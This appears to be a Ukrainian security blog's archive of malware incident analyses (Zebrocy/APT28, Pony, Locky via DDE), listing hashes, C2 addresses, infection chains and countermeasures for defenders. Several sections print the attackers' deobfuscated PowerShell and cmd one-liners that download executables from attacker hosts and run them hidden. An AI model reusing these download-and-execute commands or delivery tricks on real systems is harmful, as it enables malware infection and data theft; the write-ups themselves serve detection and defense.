Tag Archive | base64

malware#2

Невивчені уроки або логи антивірусних війн #2

(першу частину можна почитати тут)

22/02/19 доповідав про наші досягнення у розрізі аналізу malware та методів доставки.

Контент суто технічний. Без прив’язки до конкретних вендорів чи рішень.

Презентацію можна переглянути/взяти тут

Основні тези:

  • зміни по кількості та якості атак
  • актуальні методи інфільтрації систем захисту
  • приклади атак трьох різних рівнів
  • висновки

На прикладі #shade, #emotet та #sobaken пояснив можливі контрзаходи.

Кому зі slideshare не зручно – беріть у вигляді PDF (~1,1 Mb)

Будьте уважні та обережні.

VR

IOC_Zebrocy_181018

#IOC #OptiData #VR #Zebrocy #APT28 #xmltarget #W97M

Чим відрізняються цільові атаки від масових розсилок? І чому не можна одразу відкривати чергове приєднання?

Давайте розглянемо інцидент який стався вчора (18/10/18).

Мова йтиме про застосування #Zebrocy – троянське ПЗ, яке застосовується для крадіжки інформації славнозвісною групою зловмисників Sednit, також відомі як APT28 або Fancy Bear або Sofacy або STRONTIUM.

#1 Лист

Як завжди, усе починається з фейкового листа. З першого погляду пересічному користувачеві важко зрозуміти чому не можна відкривати приєднання.

Щоб було легше, нагадую про “50 відтінків фішингу“, зокрема правило 30 секунд.

Придивіться уважніше – скринька на безкоштовному Webmail I.UA підібрана таким чином, щоб скидатися на mfa.gov.ua – домен Міністерства закордонних справ України.

Претекст (зміст) листа має політичне забарвлення – окупований Крим та усе що з ним пов’язано має бути важливим для адресата-жертви.

Враження трохи псує реклама у підписі, але враховуючи той факт, що багато працівників вітчизняних компаній користуються особистими скриньками – жертву це не насторожить.

Візьміть до уваги також той факт, що на відміну від масових неперсоналізованих розсилок, даний лист був надісланий одній конкретній людині.

А якщо поглянути на лист так?

#2 Приманка

Якщо жертва дала ввести себе в оману та відкрила документ із приєднання на неї чекає неприємний сюрприз – docx файл

SHA-256 c20e5d56b35992fe74e92aebb09c40a9ec4f3d9b3c2a01efbe761fa7921dd97f
File name 1500029.docx
File size 11.4 KB

містить ресурсне посилання на зовнішній об’єкт:

Якщо трафік MS Office не контролюється і процесу Winword дозволено виходити в Інтернет відбувається завантаження другої частини – шаблону з двома макросами:

Другий документ

SHA-256 86bb3b00bcd4878b081e4e4f126bba321b81a17e544d54377a0f590f95209e46
File name Note_template.dotm
File size 401 KB

містить макрос та основну частину кодовану у Base64:

Особливість другого документу – один з макросів активується не одразу, при відкритті документу, а після того як жертва закриє другий документ.

Така схема не нова, проте мені траплялася досить рідко.

Для жертви усе проходить майже непомітно – ось тільки відкриває приєднання, одразу завантажується другий документ який демонструє звичне прохання активувати макроси:

Якщо жертва активує макроси (або ж їх запуск не блокований, як у більшості фінансових працівників) тоді перший макрос покаже чисту сторінку.

Це примусить жертву врешті-решт закрити документ. Щойно це буде зроблено – активується другий макрос, який декодує, запише на диск та запустить payload:

Отже схема атаки виглядає наступним чином:

email attach .docx > xml.rels > GET .dotm > macro > %user%\AppData\Roaming\Network\~office.exe

Зверніть увагу – шлях за яким декодується та записується перший запускний файл задано жорстко в коді макросу (!)

#3 Основна частина

Як видно із схеми процесів, перший запускний файл збирає та надсилає інформацію про систему (sysinfo + tasklist)

SHA-256 c91843a69dcf3fdad0dac1b2f0139d1bb072787a1cfcf7b6e34a96bc3c081d65
File name ~office.exe
File size 353.5 KB

C2 #1 = 185.203.118.198/en_action_device/center_correct_customer

Після збору інформації відбувається запуск другої частини, яка відповідає за закріплення та отримання команд

SHA-256 074a5836c5973bb53ab02c2bad66a4743b65c20fd6bf602cfaf09219f32d2426
File name mslicsrv.exe (mcrthost.exe)
File size 164 KB

C2 #2 = 138.204.170.189:443

В кінцевому результаті скомпрометована система виглядає так:

Для кращого відображення ось граф зв’язків по процесам:

#4 Маркери

Інфікована система ініціює наступний перелік мережевих з’єднань:

185.203.118.198 OPTIONS /documents/ HTTP/1.1 Microsoft Office Protocol Discovery      – Winword, перевірка джерела
185.203.118.198 OPTIONS / HTTP/1.1 Microsoft-WebDAV-MiniRedir/6.1.7601                     – Winword, перевірка джерела
185.203.118.198 GET /documents/Note_template.dotm HTTP/1.1 Mozilla/4.0                     – Winword, завантаження шаблону
185.203.118.198 HEAD /documents/Note_template.dotm HTTP/1.1 Microsoft Office Existence Discovery – Winword, завантаження шаблону
185.203.118.198 POST /en_action_device/center_correct_customer/drivers-i7-x86.php?tbm=AC38D1C7 HTTP/1.0 (application/x-www-form-urlencoded) Mozilla v5.1 – ~office.exe, передача зібраної інформації (sysinfo + tasklist)

Передача “відбитків” інфікованої системи:

Завдяки @Jan0fficial отримуємо розуміння як це виглядає без обфускації:

https://pastebin.com/1mR0rZz7

 

По процесам спостерігаємо наступну картину:

WINWORD.EXE 185.203.118.198:80        – Winword, перевірка джерела
svchost.exe 185.203.118.198:80              –  завантаження шаблону
~office.exe 185.203.118.198:80              ~office.exe, передача зібраної інформації (sysinfo + tasklist)
mslicsrv.exe 138.204.170.189:443          – з’єднання із С2 після закріплення

# # #

Більше маркерів (чорновик звіту) за посиланням:
https://pastebin.com/sXcERsQd

За допомогу в ідентифікації зразка дякую @Techhelplistcom

За деобфускацію дякую @Jan0fficial

#5 Контрзаходи та висновки

Контрзаходи:

  • Контролюйте/блокуйте трафік для додатків MS Office
  • Блокуйте на Proxy нетипові User Agent
  • Блокуйте запуск макросів
  • Забороняйте/контролюйте створення .exe у C:\Users\

Висновки:

  • Лист було складено дуже обережно щоб не відлякати жертву
  • Схема доставки навмисно обходить скрипти та powershell – розрахунок на часту роботу з макросами
  • payload зашитий в другий документ – так надійніше, ніж розміщувати exe на зовнішніх джерелах
  • Запуск інфікування не потребує підвищених привілеїв
  • Навіть якщо закріплення з тих чи інших причин не відбудеться – зловмисники отримають “відбитки” системи = накопичення даних для наступних атак
  • Персонал потрібно вчити розпізнавати фішинг
  • Сигнатурного антивірусу не достатньо (елементи атаки на момент контакту мали рейт по VT 2-4/50)
  • Для протидії цільовим атакам варто застосовувати рішення класу sandbox

Будьте уважні та обережні.

VR

https://pastebin.com/u/VRad

IOC_Pony_030518

Доброго вечора, панове.

Вчора була зафіксована розсилка троянського коду типу #Pony (за альтернативною класифікацією – #Fareit)

Цей тип шкідливого коду застосовується для крадіжки збережених паролів. Ми вже розбирали його варіант 27/02.

Рівень загрози, для організацій котрі не мають оновлень вразливості MS Office 2017-0199, – високий.

Станом на 16:00 4/05 джерело досі активне!

А для тих, хто уважно читає наші поради – низький.

Користувачі захисту кінцевих точок McAfee, зверніть увагу, документ та Payload перехоплюються по DAT.

Трохи аналітики:

  • RTF > 2017-0199 > HTA > PowerShell > EXE
  • Payload не кодований (This program must be run under Win32)
  • Завантаження HTA файлу засобами Winword
  • Завантаження та запуск основної частини відбувається засобами PowerShell
  • Інструкція для PowerShell кодовані, виклик прихований та обфускований (ключі -ex BYPass -NOP -w hiddeN -ec )
  • Payload зберігається і запускається з чітко прописаним іменем і шляхом (AppdAta\carin.exe)
  • Перевірка параметрів системи
  • Спроб закріплень не проводив – запустився, спробував передати і завершив себе
  • Не потребує прав Адміністратора

І так, проблеми будуть у тих, хто:

  • Не застосували виправлення 2017-0199
  • Не заборонили трафік для winword.exe (більше 50% організацій)
  • Не заборонили прихований виклик powershell та кодовані команди (більше 50% організацій)
  • Не заборонили трафік для powershell (більше 50% організацій)
  • На блокують завантаження додатків з робочих систем (50% організацій)
  • Не блокують створення та запуск нових .exe з каталогів C:\Users\**\*.exe (70% установ)

Схема атаки:

email > Attach (.doc = RTF) > GET ifeoma/htabuk.hta > mshta.exe > Powershell > GET /ifeoma/buk.exe > AppdAta\carin.exe

Файл приманка, справжній тип – RTF

RTF документ містить посилання на HTA файл

Джерело HTA та Payload (станом на 16:00 4/05 досі активне!)

Схема інфікування (включно із winword)

Схема інфікування (тільки powershell)

Маркери IOC:

файл приманка (RTF із вразливістю 2017-0199 )

SHA-256        b2d64492b92ce1d794b9d832b76f91c456f86498d512eb227164a58b6c0d833a
File name   revised invoice.doc
File size      221.6 KB

Ініціює завантаження HTA при відкритті

h11p://dhm-mhn{.} com/ifeoma/htabuk.hta

HTA файл з кодованими інструкціями для PowerShell

SHA-256        ae6a2f89c47aad291662d44db21f6cdd78e649c6027996247779cf02cc13ae5f
File name   htabuk.hta
File size      2.29 KB

Обробка НТА інструкцій викликає завантаження через PowerShell

h11p://www.dhm-mhn{.} com/ifeoma/buk.exe

Основна частина #Pony

SHA-256    c81a6211b9f1fbfc5c0b46151c29879f285a70b7a82d3cf2f262d96865a7fd82
File name   buk.exe    >>    AppdAta\carin.exe
File size      595.5 KB

Забрані паролі публікуються тут

h11p://detailingpro.co{.} in/wp-includes/panelnew/gate.php

Мережеві IOC:

108.167.172.151        dhm-mhn{.} com        Mozilla/4.0          GET /ifeoma/htabuk.hta 
108.167.172.151        dhm-mhn{.} com                                GET /ifeoma/buk.exe 
103.250.185.138        detailingpro.co.in         Mozilla/4.0          POST /wp-includes/panelnew/gate.php

Активність по процесам:

Коли жертва відкриває RTF документ-приманку winword завантажує HTA файл.

"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
C:\Windows\SysWOW64\mshta.exe -Embedding

HTA файл містить кодовані інструкції:

@encoded (base64)

IAAMACAAUwBlAHQALQBDAG8AbgB0AEUAbgB0AAkA…==

@decoded


 � �S�e�t�-�C�o�n�t�E�n�t�       �      �      �-�v�A� � � �(�   �
 � �n�E�w�-�o�B�J�e�c�t� �

@deobfuscated

Set-ContEnt-vA ( nEw-oBJect sYstem.NET.WeBCLiEnT).
DoWNloAdDATa(  h11p://dhm-mhn{.} com/ifeoma/buk.exe)-En
BYTe-PAth   $ENv:aPPDATa\carin.exe ; sTaRt$Env:AppdAta\carin.exe

Обробка HTA призводить до виклику PowerShell який завантажує та запускає основну частину:

"C:\Windows\sysTEM32\WINdOWsPoWeRShELL\v1.0\pOWershElL.eXe"  "  POWerShElL.EXE  -ex  BYPass -NOP -w        hiddeN  -ec        IAAMACAAUwBlAHQALQBDAG8AbgB0AE…

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"  -ex BYPass -NOP -w hiddeN -ec IAAMACAAUwBlAHQAL…

"C:\Users\operator\AppData\Roaming\carin.exe"

Після запуску зразок намагається з’єднатися із C2, спроб закріплень не проводив

Контрзаходи:

  • Перевірка журналів мережевого обладнання на наявність наданих вище маркерів
  • Відмова від використання RTF формату як застарілого та вразливого
  • Розгортання виправлень вразливості MS Office 2017-0199
  • Заборона мережевої активності для додатків MS Office та mshta.exe – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Заборона завантаження HTA файлів
  • Заборона запуску дочірніх процесів для додатків MS Office, mshta.exe, powershell та cmd – користувацьке правило Access Protection (McAfee ENS)
  • Заборона прихованого виклику PowerShell та виконання кодованих команд – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Заборона мережевої активності для PowerShell – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталогах C:\Users\**\
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

MS Office DDE як елемент доставки ШПЗ

IOC_Locky(DDE)_191017

Вчора на аналіз мені передали перший зразок документу-приманки, який використовує DDE для запуску процесу доставки Locky Ransomware.

Механізм Dynamic Data Exchange (DDE) є протоколом який дозволяє передачу даними між додатками. Він може бути застосований для створення документу Word чи Excel, при відкритті якого буде виконуватися довільний код. Вперше про практичне використання DDE було опубліковано ще 9/10/17. Це схоже на спосіб із OLE з яким ми уже мали справу (див JAR_OLE та JS_OLE), але замість вбудованого об’єкту при використанні DDE в документ “зашивається” команда на виконання тої чи іншої дії. Чому це становить небезпеку? В даному випадку в документі немає макросу, отже він має високі шанси пройти механізми фільтрації.

Рівень загрози – високий. Для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що payload вже детектуєтся по GTI.

Трохи аналітики:

В даному випадку зловмисники застосували DDE для обходу фільтрів пошти.

Для обходу блокування систем, що розповсюджують був введений проміжний список (перша команда powershell).

Для ускладнення виявлення кінцевої мети був введений проміжний downloader який оцінює систему і може не продовжити роботу.

(!)Цей зразок Locky має вбудовану можливість розповсюдження по локальній мережі через вразливість SMB (подібно до WannaCry)

Схема атаки:

email > .doc (DDE) > powershell > GET URL list > GET downloader > %temp%\*.exe > GET encoded payload > %temp%\*.exe

Маркери IOC:

File name I_141268.doc
SHA-256 4a7f805f6b8fec64d3cf07c02a1d200c703ce4cc6ddf2dabd56ad9d6c936c603
File size 13.03 KB

При відкритті файлу користувач бачить два повідомлення-попередження про “відновлення зв’язків”:

Якщо увімкнути відображення форм то можна побачити саму команду:

Якщо жертва натискає “Ок” в фоні winword.exe створює дочірній процес cmd та через нього передає команду на powershell:

WINWORD.EXE /n "C:\Users\operator\Desktop\I_213380.doc" /o "u" 

cmd.exe /k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://ryanbaptistchurch.com/KJHDhbje71');powershell -e $e

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('h11p://ryanbaptistchurch.com/KJHDhbje71');powershell -e $e

За посиланням знаходиться текст, це кодовані у base64 команди для PowerShell, фактично список посилань на проміжний payload

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"  -e DQAKACQAdQByAGwAcwAgAD0AIAAiAGgAdAB0AHAAOg...==

Якщо декодувати отримаємо:

$urls = "h11p://shamanic-extracts.biz/eurgf837or","h11p://centralbaptistchurchnj.org/eurgf837or","","h11p://conxibit.com/eurgf837or" 
foreach($url in $urls){
Try
{
Write-Host $url
$fp = "$env:temp\rekakva32.exe"
Write-Host $fp
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $fp)
Start-Process $fp
break
}
Catch
{
   Write-Host $_.Exception.Message
}
}

Запуск цієї команди призводить до завантаження основного тіла з одної із трьох переданих адрес та запис тіла у каталог %temp%

File name eurgf837or  >>  temp\rekakva32.exe 
SHA-256 d2cca5f6109ec060596d7ea29a13328bd0133ced126ab70974936521db64b4f4
File size 113.75 KB

Це проміжний payload, він є так званим downloader`ом. Його функція – перевірка системи на відповідність заданим параметрам.

У випадку коли параметри системи задовольняють задані критерії цей шматок коду переходить до завантаження основного тіла Locky Ransomware

rekakva32.exe > h11p://hair-select.jp/fef44gddd.enc

File name fef44gddd.enc
SHA-256 6686965dc309055937e048e9bd13e3cbb5a97a550e2af7d86914f9241e5b033e
File size 636 KB

Цей файл розшифровується проміжним payload`ом та запускається на виконання

Filename  5l46zw33.exe
SHA-256 4c054127056fb400acbab7825aa2754942121e6c49b0f82ae20e65422abdee4f
File size 636 KB

Після запуску відбувається процес шифрування файлів.

Зашифровані файли отримують розширрення .asasin 

Цей зразок також містить механізм розповсюдження по мережі використовуючи вразливість SMB (EthernalBlue).

Тому достатньо щоб в організації знайшлася хоча би одна довірлива жертва і відсутність виправлень на MS10-017.

Що можна було зробити аби уникнути інфікування ?

  1. Деактивувати оновлення посилань (DDE) – (DWORD) DontUpdateLinks = 1 (HCU\Software\Microsoft\Office\xx\Word\Options\)
  2. Заборонити процесам MS Office створювати дочірні процеси крім кількох довірених (політики ENS ATP – DAC)
  3. Заборонити для процесів PowerShell доступ до мережі Інтернет (по аналогії із першим варіантом) – але цього не буде достатньо якщо powershell викинуть із схеми
  4. Заборонити створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata% (політики VSE/ENS – Access Protection)

Мережеві IOC:

завантаження списку адрес

66.36.173.246:80    HTTP 135 ryanbaptistchurch.com GET /KJHDhbje71 HTTP/1.1

перебір джерел проміжного payload

176.103.130.130:80 HTTP 135 shamanic-extracts.biz GET /eurgf837or HTTP/1.1
176.103.130.130:80 HTTP 140 centralbaptistchurchnj.org GET /eurgf837or HTTP/1.1
176.103.130.130:80 HTTP 126 conxibit.com GET /eurgf837or HTTP/1.1

завантаження кодованого тіла Locky

180.222.185.74:80   HTTP 157 hair-select.jp GET /fef44gddd.enc HTTP/1.1

Контрзаходи:

  • Деактивація DDE (через параметр реєстру) або груповими політиками
  • Заборона створення дочірніх процесів для додатків MS Office
  • Заборона доступу до мережі Інтернет для powershell – не надійно, бо DDE не обмежується передачею команд тільки на powershell
  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

PS

Додаткові джерела по темі DDE

  1. Microsoft Office Attack Runs Malware Without Needing Macros
  2. Malware delivered via Necurs botnet by DDE feature in Microsoft Word
  3. How to protect yourself from exploits in Office programs
VR